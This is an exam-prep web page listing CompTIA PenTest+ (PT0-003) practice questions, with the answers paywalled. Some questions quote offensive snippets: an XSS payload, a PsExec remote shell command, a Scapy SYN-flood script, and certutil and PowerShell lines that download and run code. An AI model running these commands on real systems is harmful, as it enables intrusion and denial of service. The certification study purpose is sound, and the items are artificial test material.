ExamGecko
Login
Home / CompTIA / PT0-003 / List of questions
Ask Question

CompTIA PT0-003 Practice Test - Questions Answers, Page 16

Add to Whishlist

List of questions

Question 151

Report Export Collapse

During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:

html

Copy code

7/<sCRitP>aLeRt('pwned')</ScriPt>

Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?

Become a Premium Member for full access
  Unlock Premium Member

Question 152

Report Export Collapse

A penetration tester is performing a security review of a web application. Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?

Become a Premium Member for full access
  Unlock Premium Member

Question 153

Report Export Collapse

Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?

Become a Premium Member for full access
  Unlock Premium Member

Question 154

Report Export Collapse

A penetration tester launches an attack against company employees. The tester clones the company's intranet log-in page and sends the link via email to all employees. Which of the following best describes the objective and tool selected by the tester to perform this activity?

Become a Premium Member for full access
  Unlock Premium Member

Question 155

Report Export Collapse

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Become a Premium Member for full access
  Unlock Premium Member

Question 156

Report Export Collapse

During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?

Become a Premium Member for full access
  Unlock Premium Member

Question 157

Report Export Collapse

A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?

Become a Premium Member for full access
  Unlock Premium Member

Question 158

Report Export Collapse

Which of the following techniques is the best way to avoid detection by data loss prevention tools?

Become a Premium Member for full access
  Unlock Premium Member

Question 159

Report Export Collapse

While performing a penetration testing exercise, a tester executes the following command:

bash

Copy code

PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Become a Premium Member for full access
  Unlock Premium Member

Question 160

Report Export Collapse

During a penetration testing exercise, a team decides to use a watering hole strategy. Which of the following is the most effective approach for executing this attack?

Become a Premium Member for full access
  Unlock Premium Member
Total 240 questions
Go to page: of 24
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use? https://192.168.0.1/foo.exe A. powershell.exe impo C:\tools\foo.ps1 B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe C. powershell.exe -noni -encode IEX.Downloadstring(' http://172.16.0.1/ ') D. rundll32.exe c:\path\foo.dll,functName&lt;/a&gt;
During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?
A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?
A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: ip = IP('192.168.50.2') tcp = TCP(sport=RandShort(), dport=80, flags='S') raw = RAW(b'X'*1024) p = ip/tcp/raw send(p, loop=1, verbose=0) Which of the following attack types is most likely being used in the test?
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?
During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?